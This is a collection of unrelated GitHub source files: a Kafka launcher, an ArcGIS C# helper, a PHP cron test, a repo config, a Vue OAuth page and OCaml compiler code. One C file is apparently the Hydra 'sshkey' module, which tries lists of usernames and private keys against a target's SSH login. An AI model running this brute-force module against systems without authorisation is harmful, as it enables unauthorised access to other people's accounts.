text
stringlengths
2
100k
meta
dict
#!/usr/bin/env python from kafka_utils.kafka_manual_throttle.main import run if __name__ == '__main__': run()
{ "pile_set_name": "Github" }
/* See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * Esri Inc. licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ using System; using System.Collections.Generic; using System.Linq; using System.Text; using ESRI.ArcGIS.Geodatabase; using ESRI.ArcGIS.Geoprocessor; using ESRI.ArcGIS.ConversionTools; using System.Net; using System.IO; using System.Windows.Forms; namespace com.esri.gpt.publish { /// <summary> /// Helper class with geoprocessing functions. /// </summary> public static class GpHelper { /// <summary> /// The geoprocessor object used to execute geoprocessing tools. /// The track cancel object allows geoprocessing to be interrupted. /// </summary> static private int retVal; static private Geoprocessor geoprocessor; static private object MaxSeverityErrCode = esriGPMessageSeverity.esriGPMessageSeverityError; /// <summary> /// Class constructor handles instantiation of a GeoProcessor /// </summary> static GpHelper() { if (geoprocessor == null) geoprocessor = new Geoprocessor(); // this takes a few seconds... // Instruct the geoprocessing engine to not add output to // the map document, but allow it to overwrite GP output. geoprocessor.AddOutputsToMap = false; geoprocessor.OverwriteOutput = true; } /// <summary> /// Private wrapper used to execute an IGPProcess gpTool, returning either zero /// if the tool's execution succeedes without any errors or the MaxSeverityErrCode /// if one or more errors are realized by the geoprocessor. /// param name="gpTool" the geoprocessing tool /// </summary> static private void Execute(IGPProcess gpTool) { geoprocessor.Execute(gpTool, null); if (geoprocessor.MaxSeverity < (int)MaxSeverityErrCode) retVal = 0; else retVal = geoprocessor.MaxSeverity; } /// <summary> /// Public wrapper used to execute an instantiated ESRITranslator geoprocessing tool. /// The wrapper's try/catch block contains an error message identifying the type of tool. /// param name="gpTool" the geoprocessing tool /// param name="xmlFilePaths" the xml file paths /// </summary> static public int Execute(ESRITranslator gpTool, out string[] xmlFilePaths) { // Instantiate a new string array and set the anticipated paths // into the array. Invoking method is responsible for cleanup // once it has processed the files generated by this method. xmlFilePaths = new string[3]; xmlFilePaths[0] = gpTool.source.ToString(); // Original XML xmlFilePaths[1] = gpTool.output.ToString(); // Translated XML xmlFilePaths[2] = gpTool.logfile.ToString(); // Translation Log try { Execute(gpTool as IGPProcess); } catch (Exception ex) { } return retVal; } /// <summary> /// Public wrapper used to execute an instantiated MDPublisher geoprocessing tool. /// The wrapper's try/catch block contains an error message identifying the type of tool. ///param name="gpTool" the geoprocessing tool ///param name="publicationResults" the publication results /// </summary> static public int Execute(MDPublisher gpTool, out string[] publicationResults) { publicationResults = new string[1]; object PubMaxSeverityErrCode = esriGPMessageSeverity.esriGPMessageSeverityInformative; try { Execute(gpTool as IGPProcess); if (geoprocessor.MaxSeverity >= (int)PubMaxSeverityErrCode) { publicationResults[0] = geoprocessor.GetMessages(ref PubMaxSeverityErrCode); retVal = -1; } } catch (Exception ex) { StringBuilder sb = new StringBuilder(); sb.AppendLine("Unexpected exception generated by geoprocessing tool"); sb.AppendLine("Metadata Publisher (Conversion Tools - Metadata)"); sb.AppendLine(""); sb.AppendLine(ex.Message); MessageBox.Show(sb.ToString(), "Publication Failure", MessageBoxButtons.OK, MessageBoxIcon.Warning); retVal = -1; } return retVal; } /// <summary> /// Public wrapper used to execute an instantiated ImportMetadata geoprocessing tool. /// The wrapper's try/catch block contains an error message identifying the type of tool. ///param name="gpTool" the geoprocessing tool ///param name="xmlFilePaths" the xml file paths /// </summary> static public int Execute(ImportMetadata gpTool, out string[] xmlFilePaths) { // Instantiate a new string array and set the anticipated paths // into the array. Invoking method is responsible for cleanup // once it has processed the files generated by this method. xmlFilePaths = new string[3]; xmlFilePaths[0] = gpTool.Source_Metadata.ToString(); // Original XML xmlFilePaths[1] = gpTool.Output_Metadata.ToString(); // Translated XML try { Execute(gpTool as IGPProcess); } catch (Exception ex) { StringBuilder sb = new StringBuilder(); sb.AppendLine("Unexpected exception generated by geoprocessing tool"); sb.AppendLine("Metadata Translator (Conversion Tools - Metadata)"); sb.AppendLine(""); sb.AppendLine(ex.Message); MessageBox.Show(sb.ToString(), "Translation Failure", MessageBoxButtons.OK, MessageBoxIcon.Warning); retVal = -1; } return retVal; } /// <summary> /// Returns an instantiated ESRITranslator geoprocessing tool with input /// and output parameters set to the specified values. /// param name="inFile" input file to be translated /// </summary> static public ESRITranslator xmlTranslator(string inFile,string translatorPath) { // Assign/Create the temporary files for translation output string outFile = Path.GetTempFileName(); string logFile = Path.GetTempFileName(); // Identify the XSL transformation to be used string xslTranslator = Path.Combine(Globals.ArcGISInstallationFolderFromCommandLine, translatorPath); // Instantiate the geoprocessing tool and define its parameters // Usage: ESRITranslator_conversion <source> <translator> <output> <logfile> ESRITranslator mdTranslator = new ESRITranslator(); mdTranslator.source = inFile; if (xslTranslator.Trim().Length > 0) { mdTranslator.translator = xslTranslator; // "" } else { mdTranslator.translator = ""; } mdTranslator.output = outFile; mdTranslator.logfile = logFile; return mdTranslator; } /// <summary> /// Returns an instantiated ESRITranslator geoprocessing tool with input /// and output parameters set to the specified values. /// param name="inFile" the input file /// param name="xmlFileName" the xml file name /// param name="xsltFile" the xslt file /// </summary> static public ESRITranslator xmlTranslator(string inFile, String xsltFile, String xmlFileName) { // Assign/Create the temporary files for translation output string outFile = xmlFileName; string logFile = Path.GetTempFileName(); // Identify the XSL transformation to be used string xslTranslator = xsltFile; // Instantiate the geoprocessing tool and define its parameters // Usage: ESRITranslator_conversion <source> <translator> <output> <logfile> ESRITranslator mdTranslator = new ESRITranslator(); mdTranslator.source = inFile; mdTranslator.translator = xslTranslator; mdTranslator.output = outFile; mdTranslator.logfile = logFile; return mdTranslator; } /// <summary> /// Returns an instantiated MDPublisher geoprocessing tool with input /// and output parameters set to the specified values. /// param name="inFile" the input file /// param name="mdFileID" a file identifier (like source uri) /// param name="param" the publication parameters /// </summary> static public MDPublisher xmlPublisher(string inFile, string mdFileID, PublicationParams param) { // Instantiate the geoprocessing tool and define its parameters // Usage: MDPublisher_conversion <source> <publisher> <url> <service> <user> <password> MDPublisher mdPublisher = new MDPublisher(); mdPublisher.source = inFile; mdPublisher.publisher = param.CurrentWorkDir; mdPublisher.url = param.ServerUrl; mdPublisher.service = param.Service + ":EB:" + mdFileID; mdPublisher.user = param.UserName; mdPublisher.password = param.Password; return mdPublisher; } /// <summary> /// Returns an instantiated ImportMetadata geoprocessing tool with input /// and output parameters set to the specified values. /// param name="inFile" the input file /// param name="xmlFileName" the xml file name /// </summary> static public ImportMetadata xmlImporter(string inFile, String xmlFileName) { // Assign/Create the temporary files for translation output string outFile = xmlFileName; string logFile = Path.GetTempFileName(); // Instantiate the geoprocessing tool and define its parameters // Usage: MDImporter_conversion <source> <output> ImportMetadata mdImporter = new ImportMetadata(); mdImporter.Source_Metadata = inFile; mdImporter.Output_Metadata = outFile; return mdImporter; } } }
{ "pile_set_name": "Github" }
<?php namespace Cron\Tests; use Cron\HoursField; use DateTime; use PHPUnit\Framework\TestCase; /** * @author Michael Dowling <[email protected]> */ class HoursFieldTest extends TestCase { /** * @covers \Cron\HoursField::validate */ public function testValidatesField() { $f = new HoursField(); $this->assertTrue($f->validate('1')); $this->assertTrue($f->validate('00')); $this->assertTrue($f->validate('01')); $this->assertTrue($f->validate('*')); $this->assertFalse($f->validate('*/3,1,1-12')); } /** * @covers \Cron\HoursField::increment */ public function testIncrementsDate() { $d = new DateTime('2011-03-15 11:15:00'); $f = new HoursField(); $f->increment($d); $this->assertSame('2011-03-15 12:00:00', $d->format('Y-m-d H:i:s')); $d->setTime(11, 15, 0); $f->increment($d, true); $this->assertSame('2011-03-15 10:59:00', $d->format('Y-m-d H:i:s')); } /** * @covers \Cron\HoursField::increment */ public function testIncrementsDateWithThirtyMinuteOffsetTimezone() { $tz = date_default_timezone_get(); date_default_timezone_set('America/St_Johns'); $d = new DateTime('2011-03-15 11:15:00'); $f = new HoursField(); $f->increment($d); $this->assertSame('2011-03-15 12:00:00', $d->format('Y-m-d H:i:s')); $d->setTime(11, 15, 0); $f->increment($d, true); $this->assertSame('2011-03-15 10:59:00', $d->format('Y-m-d H:i:s')); date_default_timezone_set($tz); } /** * @covers \Cron\HoursField::increment */ public function testIncrementDateWithFifteenMinuteOffsetTimezone() { $tz = date_default_timezone_get(); date_default_timezone_set('Asia/Kathmandu'); $d = new DateTime('2011-03-15 11:15:00'); $f = new HoursField(); $f->increment($d); $this->assertSame('2011-03-15 12:00:00', $d->format('Y-m-d H:i:s')); $d->setTime(11, 15, 0); $f->increment($d, true); $this->assertSame('2011-03-15 10:59:00', $d->format('Y-m-d H:i:s')); date_default_timezone_set($tz); } }
{ "pile_set_name": "Github" }
rebaseMergeAllowed: true squashMergeAllowed: true mergeCommitAllowed: false branchProtectionRules: - pattern: master isAdminEnforced: true requiredStatusCheckContexts: - 'Kokoro - Test: Binary Compatibility' - 'Kokoro - Test: Code Format' - 'Kokoro - Test: Dependencies' - 'Kokoro - Test: Java 11' - 'Kokoro - Test: Java 7' - 'Kokoro - Test: Java 8' - 'Kokoro - Test: Linkage Monitor' - 'cla/google' requiredApprovingReviewCount: 1 requiresCodeOwnerReviews: true requiresStrictStatusChecks: true permissionRules: - team: Googlers permission: pull - team: yoshi-java permission: push - team: java-samples-reviewers permission: push - team: yoshi-java-admins permission: admin - team: yoshi-admins permission: admin
{ "pile_set_name": "Github" }
/* libssh is available at http://www.libssh.org current version is 0.4.8 If you want support for ssh v1 protocol, you have to add option -DWITH_SSH1=On in the cmake */ #include "hydra-mod.h" #ifndef LIBSSH void dummy_sshkey() { printf("\n"); } #else #include <libssh/libssh.h> #if LIBSSH_VERSION_MAJOR == 0 && LIBSSH_VERSION_MINOR >= 4 extern ssh_session session; extern char *HYDRA_EXIT; extern int new_session; int start_sshkey(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { char *empty = ""; char *login, *key, keep_login[300]; int auth_state = 0, rc = 0; ssh_private_key privkey; if (strlen(login = hydra_get_next_login()) == 0) login = empty; if (strlen(key = hydra_get_next_password()) == 0) key = empty; if (new_session) { if (session) { ssh_disconnect(session); ssh_finalize(); ssh_free(session); } session = ssh_new(); ssh_options_set(session, SSH_OPTIONS_PORT, &port); ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip)); ssh_options_set(session, SSH_OPTIONS_USER, login); ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "none"); ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, "none"); if (ssh_connect(session) != 0) { //if the connection was drop, exit and let hydra main handle it if (verbose) hydra_report(stderr, "[ERROR] could not connect to target port %d\n", port); return 3; } if ((rc = ssh_userauth_none(session, NULL)) == SSH_AUTH_ERROR) { return 3; } else if (rc == SSH_AUTH_SUCCESS) { hydra_report_found_host(port, ip, "sshkey", fp); hydra_completed_pair_found(); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 2; else return 1; } } else new_session = 1; auth_state = ssh_auth_list(session); if ((auth_state & SSH_AUTH_METHOD_PUBLICKEY) > 0) { privkey = privatekey_from_file(session, key, 0, NULL); if (!privkey) { hydra_report(stderr, "[ERROR] skipping invalid private key: \"%s\"\n", key); hydra_completed_pair(); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 2; return 1; } auth_state = ssh_userauth_pubkey(session, NULL, NULL, privkey); } else { return 4; } if (auth_state == SSH_AUTH_ERROR) { new_session = 1; return 1; } if (auth_state == SSH_AUTH_SUCCESS || auth_state == SSH_AUTH_PARTIAL) { hydra_report_found_host(port, ip, "sshkey", fp); hydra_completed_pair_found(); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 2; return 1; } else { strncpy(keep_login, login, sizeof(keep_login) - 1); keep_login[sizeof(keep_login) - 1] = '\0'; hydra_completed_pair(); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 2; login = hydra_get_next_login(); if (strcmp(login, keep_login) == 0) new_session = 0; return 1; } /* not reached */ return 1; } void service_sshkey(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { int run = 1, next_run = 1, sock = -1; hydra_register_socket(sp); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return; while (1) { switch (run) { case 1: /* connect and service init function */ next_run = start_sshkey(sock, ip, port, options, miscptr, fp); break; case 2: ssh_disconnect(session); ssh_finalize(); ssh_free(session); hydra_child_exit(0); case 3: ssh_disconnect(session); ssh_finalize(); ssh_free(session); fprintf(stderr, "[ERROR] ssh protocol error\n"); hydra_child_exit(2); case 4: ssh_disconnect(session); ssh_finalize(); ssh_free(session); fprintf(stderr, "[ERROR] ssh target does not support pubkey auth\n"); hydra_child_exit(2); default: ssh_disconnect(session); ssh_finalize(); ssh_free(session); hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); hydra_child_exit(2); } run = next_run; } } #else #error "You are not using v0.4.x. Download from http://www.libssh.org and add -DWITH_SSH1=On in cmake to enable SSH v1 support" #endif #endif int service_sshkey_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { // called before the childrens are forked off, so this is the function // which should be filled if initial connections and service setup has to be // performed once only. // // fill if needed. // // return codes: // 0 all OK // -1 error, hydra will exit, so print a good error message here return 0; }
{ "pile_set_name": "Github" }
using System.Windows.Controls; using System.Windows.Media; namespace Utilities.GUI { /// <summary> /// Use this class to access "cached" values for some of the common dependency properties. /// It is a lot faster setting them using this if you very frequently set them to the same value (i.e. don't actually change them...) /// This specifically tailors PropertyShadow for Canvas so we can also cache Backgrounds, etc. /// </summary> public class PropertyShadowForPanels : PropertyShadow { private Panel panel; public PropertyShadowForPanels(Panel panel) : base(panel) { this.panel = panel; _shadow_Background = panel.Background; } private Brush _shadow_Background = null; public bool SetShadowBackground(Brush value) { if (_shadow_Background != value) { panel.Background = _shadow_Background = value; return true; } else { return false; } } } }
{ "pile_set_name": "Github" }
<template> <top-page /> </template> <script> import { mapActions } from 'vuex' import { ADD_TOAST_MESSAGE } from 'vuex-toast' import TopPage from '~/components/pages/TopPage' import { getOAuthParams, removeOAuthParams } from '~/utils/oauth' export default { components: { TopPage }, async fetch({ store }) { await store.dispatch('article/getTopics') store.dispatch('article/resetArticleData') }, async mounted() { try { const { code, state } = this.$route.query this.$router.replace('/') if (!code || !state) return const { hasUserId, status } = await this.$store.dispatch('user/checkAuthByYahoo', { code, state }) if (!hasUserId) { this.$store.dispatch('user/setSignUpAuthFlowModal', { showSignUpAuthFlowModal: true }) this.$store.dispatch('user/setSignUpAuthFlowInputUserIdModal', { isShow: true }) return } await this.$store.dispatch('user/getUserSession') if (status === 'login') { const oauthParams = getOAuthParams() if (oauthParams) { this.$router.push({ path: 'oauth-authenticate', query: { ...oauthParams } }) removeOAuthParams() } return } this.$store.dispatch('user/setSignUpAuthFlowModal', { showSignUpAuthFlowModal: true }) this.$store.dispatch('user/setSignUpAuthFlowInputPhoneNumberModal', { isSignUpAuthFlowInputPhoneNumberModal: true }) } catch (error) { const { message } = error.response.data switch (message) { case 'EmailExistsException': this.sendNotification({ text: 'ご利用いただいた外部サービスに紐づくメールアドレスは既に登録されています' }) this.$store.dispatch('user/setSignUpModal', { showSignUpModal: true }) break case 'NotRegistered': this.sendNotification({ text: 'アカウントが登録されていません。新規登録を行ってください', type: 'warning' }) break default: this.sendNotification({ text: 'エラーが発生しました。お手数ですが、時間をおいて再度お試しください', type: 'warning' }) break } } }, methods: { ...mapActions({ sendNotification: ADD_TOAST_MESSAGE }) } } </script>
{ "pile_set_name": "Github" }
(* Copyright (c) 2011, Julien Verlaguet All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of Julien Verlaguet nor the names of contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *) open Utils open Ist module ExtractRecords = struct let rec pat acc ptl = lfold pat_tuple acc ptl and pat_tuple acc pel = lfold pat_el acc pel and pat_el acc (ty, p) = let acc, p = pat_ ty acc p in acc, (ty, p) and pat_ ty acc = function | Pany | Pid _ | Pvalue _ as p -> acc, p | Pvariant (x, p) -> let acc, p = pat acc p in acc, Pvariant (x, p) | Precord pfl -> let v = Ident.tmp() in let acc = List.fold_left (pat_field ty v) acc pfl in acc, Pid v | Pas (v, p) -> let acc, p = pat acc p in acc, Pas (v, p) and pat_field ty v acc = function | PFany -> acc | PFid x -> ([ty, x], Est.Eid (ty, v)) :: acc | PField (fd_id, [l]) -> let xl = List.map get_field_id l in (xl, Est.Efield ((ty, v), fd_id)) :: acc | PField _ -> assert false and get_field_id = function | (ty, Pid x) -> (ty, x) | (ty, Pany) -> (ty, Ident.tmp()) | _ -> assert false end module SplitPat = struct let rec pat ptl = let ptl = List.fold_right pat_tuple ptl [] in ptl and pat_tuple pel acc = match pel with | [] -> assert false | [x] -> let xl = pat_el x in List.fold_right (fun x acc -> [x] :: acc) xl acc | x :: rl -> let rl = pat_tuple rl [] in let x = pat_el x in List.fold_right ( fun x acc -> List.fold_right ( fun rl acc -> (x :: rl) :: acc ) rl acc ) x acc and pat_el (ty, pe) = let pel = pat_ pe in List.map (fun x -> ty, x) pel and pat_ = function | Pany | Pvariant (_, []) | Pid _ as x -> [x] | Pvalue _ -> [Pany] (* TODO only possible value is unit *) | Pvariant (x, p) -> let pl = pat p in List.map (fun y -> Pvariant (x, [y])) pl | Precord pfl -> let pfid = List.fold_left pf_id None pfl in let pfll = List.fold_right pat_field pfl [] in let recl = break_record pfll in (match pfid with | None -> List.map (fun x -> Precord x) recl | Some x -> List.map (fun l -> Precord (x :: l)) recl) | Pas (x, p) -> let pl = pat p in List.map (fun p -> Pas (x, [p])) pl and break_record pfll = match pfll with | [] -> assert false | [x, l] -> List.map (fun y -> [PField (x, [y])]) l | (x, l) :: rl -> let recl = break_record rl in List.fold_right ( fun recl acc -> List.fold_right ( fun p acc -> (PField (x, [p]) :: recl) :: acc ) l acc ) recl [] and pf_id acc pf = match pf with | PFany | PFid _ -> Some pf | PField _ -> acc and pat_field pf acc = match pf with | PFany | PFid _ -> acc | PField (x, p) -> (x, pat p) :: acc end module BreakPat = struct (* If you understand this code, good for you ! because I don't ... *) open Est let make_idl l = List.map (fun (ty, _) -> ty, Ident.tmp()) l let add_subst x y m = let l = try IMap.find x m with Not_found -> [] in IMap.add x (y :: l) m let rec partition id s = function | [] -> s, None, [] | ([], _) :: rl2 -> partition id s rl2 | ((ty, Pvariant (x, l1)) :: rl1, a) :: rl2 -> let s, todo, p = partition id s rl2 in s, todo, (match p with | [] -> [ty, `V x, [l1], [rl1, a]] | (_, `V y, subpl, pl) :: rl when x = y -> (ty, `V x, l1 :: subpl, (rl1, a) :: pl) :: rl | l -> let rest1, rest2 = match todo with | None -> [], [] | Some a -> let rest1 = List.map (fun (ty, _) -> ty, Pany) l1 in let l = List.map (fun (x, _) -> x, Pany) rl1 in [rest1], [l, a] in (ty, `V x, l1 :: rest1, (rl1, a) :: rest2) :: l) | ([ty, Pany], a) :: rl2 -> let s, _, p = partition id s rl2 in s, Some a, (ty, `U, [[]], [[], a]) :: p | ((ty, Pany) :: rl1, a) :: rl2 -> let s, _, p = partition id s rl2 in s, Some a, (match p with | [] -> [ty, `U, [[]], [rl1, a]] | part -> List.map ( fun (ty, x, subpl, pl) -> ty, x, subpl, (rl1, a) :: pl ) part) | ([ty, Pid x], a) :: rl2 -> let s, _, p = partition id s rl2 in let s = add_subst x id s in s, Some a, (ty, `U, [[]], [[], a]) :: p | ((ty, Pid x) :: rl1, a) :: rl2 -> let s, _, p = partition id s rl2 in let s = add_subst x id s in s, Some a, (match p with | [] -> [ty, `U, [[]], [rl1, a]] | part -> List.map ( fun (ty, x, subpl, pl) -> ty, x, subpl, (rl1, a) :: pl ) part) | ((_, Precord _) :: _, _) :: _ -> assert false | ((_, Pas (x, p)) :: rl1, a) :: rl2 -> let pa = (p :: rl1, a) :: rl2 in let s, todo, p = partition id s pa in let s = add_subst x id s in s, todo, p let rec pmatch subst idl pal = match idl with | [] -> assert false | id :: rl -> let subst, _, pal = partition id subst pal in let subst, al = lfold ( fun subst (ty, x, subpl, al) -> let idl = make_idl (List.hd subpl) in let pidl = List.map (fun (ty, x) -> ty, Pid x) idl in if idl = [] then let subst, sub = if rl = [] then subst, snd (List.hd al) else pmatch subst rl al in subst, (make_pat ty x pidl, sub) else let subst, pal = make_sub (fst id) rl subst subpl al in let subst, sub = pmatch subst idl pal in subst, (make_pat ty x pidl, sub) ) subst pal in subst, Ematch ([id], al) and make_sub ty idl subst subpl al = match subpl, al with | [], l -> subst, List.map (fun (_, x) -> [ty, Pany], x) l | _, [] -> assert false | p :: rl1, (a :: rl2 as al) -> let subst, sub = if idl = [] then subst, snd a else pmatch subst idl al in let pa = p, sub in let subst, sub = make_sub ty idl subst rl1 rl2 in subst, pa :: sub and make_pat ty x pidl = match x with | `V x -> [ty, Pvariant (x, pidl)] | `U -> [ty, Pany] end module PatOpt = struct open Est let rec dummy e = match e with | Ematch (x, pal) -> let pal = List.map (fun (x, y) -> x, dummy y) pal in let pal = truncate pal in (match pal with | ((_, Pany) :: _, e) :: _ -> e | _ -> Ematch (x, pal)) | x -> x and truncate = function | [] -> [] | ((_, Pany) :: _, _) as last :: _ -> [last] | x :: rl -> x :: truncate rl let rec exhaustive t e = e let expr t e = let e = dummy e in e end type t = { blocks: Est.block list ; eqs: Est.equation list ; subst: Ident.t IMap.t ; } let empty = { blocks = [] ; eqs = [] ; subst = IMap.empty ; } let add_subst subst psubst = IMap.fold ( fun x y acc -> match y with | [y] -> IMap.add x (snd y) acc | y -> (* TODO check this *) List.fold_left (fun acc y -> IMap.add (snd y) x acc) acc y ) psubst subst let new_id = Ident.tmp let new_label = Ident.tmp let rec program mdl = List.rev_map module_ mdl and module_ md = { Est.md_sig = md.md_sig ; Est.md_id = md.md_id ; Est.md_decls = md.md_decls ; Est.md_defs = List.map def md.md_defs ; } and def (k, x, p, e) = let t = empty in let idl1 = make_params p in let t, idl2 = tuple t e in let fblock = block t.eqs (Est.Return (false, idl2)) in let def = { Est.df_id = x ; Est.df_kind = k ; Est.df_args = idl1 ; Est.df_return = idl2 ; Est.df_body = fblock :: t.blocks ; } in EstSubst.def t.subst def and make_idl tyl = List.map (fun ty -> (ty, new_id())) tyl and make_params = function | [l] -> List.map ( fun (ty, x) -> match x with | Pvalue (Eunit) | Pany -> (ty, new_id()) | Pid x -> ty, x | _ -> assert false) l | _ -> assert false and block eqs retl = { Est.bl_id = new_label() ; Est.bl_phi = [] ; Est.bl_eqs = List.rev eqs ; Est.bl_ret = retl ; } and pat p lbl = List.map (pat_tuple lbl) p and pat_tuple lbl pel = List.map pat_el pel, lbl and pat_el (ty, p) = ty, pat_ p and pat_ = function | Pany -> Est.Pany | Pid x -> Est.Pid x | Pvalue _ -> assert false | Pvariant (x, []) -> Est.Pvariant (x, []) | Pvariant (x, [p]) -> Est.Pvariant (x, List.map pat_el p) | Pvariant _ -> assert false | Precord pfl -> let id_opt = get_rid pfl in let pfl = List.filter (function PField _ -> true | _ -> false) pfl in let pfl = List.map ( function | PField (x, [p]) -> x, List.map pat_el p | PField _ -> assert false | _ -> assert false ) pfl in Est.Precord (id_opt, pfl) | Pas (x, [[p]]) -> Est.Pas (x, pat_el p) | Pas _ -> assert false and simpl_pat l = try List.iter ( fun (_, p) -> match p with Pid _ | Pany -> () | _ -> raise Exit ) l ; true with Exit -> false and get_rid = function | [] -> None | PFid x :: _ -> Some x | _ :: rl -> get_rid rl and tuple t el = match el with | [] -> t, [] | (tyl, e) :: rl -> let t, idl1 = tuple t rl in let t, idl2 = expr_ t tyl e in t, idl2 @ idl1 and expr t (tyl, e) = let t, idl = expr_ t tyl e in let id = lone idl in let id = fst id, snd id in t, id and expr_ t tyl = function | Eid x -> (* t, [lone tyl, x] *) let idl = make_idl tyl in let ty = match tyl with [ty] -> ty | _ -> assert false in let t = equation t idl (Est.Eid (ty, x)) in t, idl | Efield (e, x) -> let idl = make_idl tyl in let t, id = expr t e in let t = equation t idl (Est.Efield (id, x)) in t, idl | Ematch (e, al) -> let idl = make_idl tyl in let t, eidl = tuple t e in let t, al = List.fold_right action al (t, []) in let psubst = IMap.empty in let psubst, e = BreakPat.pmatch psubst eidl al in let t = { t with subst = add_subst t.subst psubst } in let e = PatOpt.expr t e in let t, e = ematch 0 t tyl e in let t = equation t idl e in t, idl (* | Elet ([l], e1, e2) when simpl_pat l -> let t, idl = tuple t e1 in tuple t e2 *) | Elet (p, e1, e2) -> expr_ t tyl (Ematch (e1, [p, e2])) | Eif (e1, e2, e3) -> let t, id1 = expr t e1 in let eqs = t.eqs in let t = { t with eqs = [] } in let t, idl1 = tuple t e2 in let bl1 = block t.eqs (Est.Lreturn idl1) in let t = { t with blocks = bl1 :: t.blocks } in let t = { t with eqs = [] } in let t, idl2 = tuple t e3 in let bl2 = block t.eqs (Est.Lreturn idl2) in let t = { t with blocks = bl2 :: t.blocks } in let t = { t with eqs = eqs } in let ridl = make_idl tyl in let t = equation t ridl (Est.Eif (id1, bl1.Est.bl_id, bl2.Est.bl_id)) in t, ridl | Eapply (b, fk, ty, x, e) -> let t, x = expr t ([ty], Ist.Eid x) in let t, idl1 = tuple t e in let idl2 = make_idl tyl in let t = equation t idl2 (Est.Eapply (b, fk, x, idl1)) in t, idl2 | Eseq (e1, e2) -> let t, _ = expr t e1 in let t, idl = tuple t e2 in t, idl | Eswap (e1, e2, e3) -> let t, e1 = expr t e1 in let t, e2 = expr t e2 in let t, e3 = expr t e3 in let idl2 = make_idl tyl in let t = equation t idl2 (Est.Eswap (e1, e2, e3)) in t, idl2 | e -> simpl_expr t tyl e and simpl_expr t tyl e = let x = new_id() in let ty = lone tyl in let id = ty, x in let t, e = simpl_expr_ t ty e in let t = equation t [id] e in t, [id] and simpl_expr_ t ty = function | Evalue v -> t, Est.Evalue v | Evariant (x, e') -> let t, idl = tuple t e' in t, Est.Evariant (x, idl) | Ebinop (bop, e1, e2) -> let t, id1 = expr t e1 in let t, id2 = expr t e2 in t, Est.Ebinop (bop, id1, id2) | Euop (uop, e) -> let t, id = expr t e in t, Est.Euop (uop, id) | Erecord fdl -> let t, fdl = lfold field t fdl in t, Est.Erecord fdl | Ewith (e, fdl) -> let t, id = expr t e in let t, fdl = lfold field t fdl in t, Est.Ewith (id, fdl) | Efree (ty, x) -> t, Est.Efree (ty, x) | Eset (e1, e2, e3) -> let t, e1 = expr t e1 in let t, e2 = expr t e2 in let t, e3 = expr t e3 in t, Est.Eset (e1, e2, e3) | Eget (e1, e2) -> let t, e1 = expr t e1 in let t, e2 = expr t e2 in t, Est.Eget (e1, e2) | Epartial (f, e) -> let t, f = expr t f in let t, idl = tuple t e in t, Est.Epartial (f, idl) | Efun _ -> assert false | (Eseq (_, _)|Eapply (_, _, _, _, _)|Eif (_, _, _)|Elet (_, _, _)|Ematch (_, _) | Efield (_, _)|Eid _) | Eswap _ -> assert false and field t (x, e) = let t, idl = tuple t e in t, (x, idl) and action (p, e) (t, acc) = let eqs, p = ExtractRecords.pat [] p in let t, label = make_block t eqs e in let pll = SplitPat.pat p in let pll = List.fold_right (fun p acc -> pat [p] label :: acc) pll [] in let pl = List.flatten pll in t, pl @ acc and equation t idl e = { t with eqs = (idl, e) :: t.eqs } and make_block t record_eqs e = let eqs = t.eqs in let t = { t with eqs = record_eqs } in let t, idl = tuple t e in let bl = block t.eqs (Est.Lreturn idl) in let t = { t with blocks = bl :: t.blocks } in let t = { t with eqs = eqs } in let label = Est.Ecall bl.Est.bl_id in t, label and ematch depth t tyl e = match e with | Est.Ecall _ -> t, e | Est.Ematch (c, al) -> let t, al = lfold (fun t (p, a) -> let t, a = ematch (depth+1) t tyl a in t, (p, a)) t al in let idl = make_idl tyl in let ematch = Est.Ematch (c, al) in if depth = 0 then t, ematch else let bl = block [idl, ematch] (Est.Lreturn idl) in let t = { t with blocks = bl :: t.blocks } in t, Est.Ecall bl.Est.bl_id | _ -> assert false
{ "pile_set_name": "Github" }
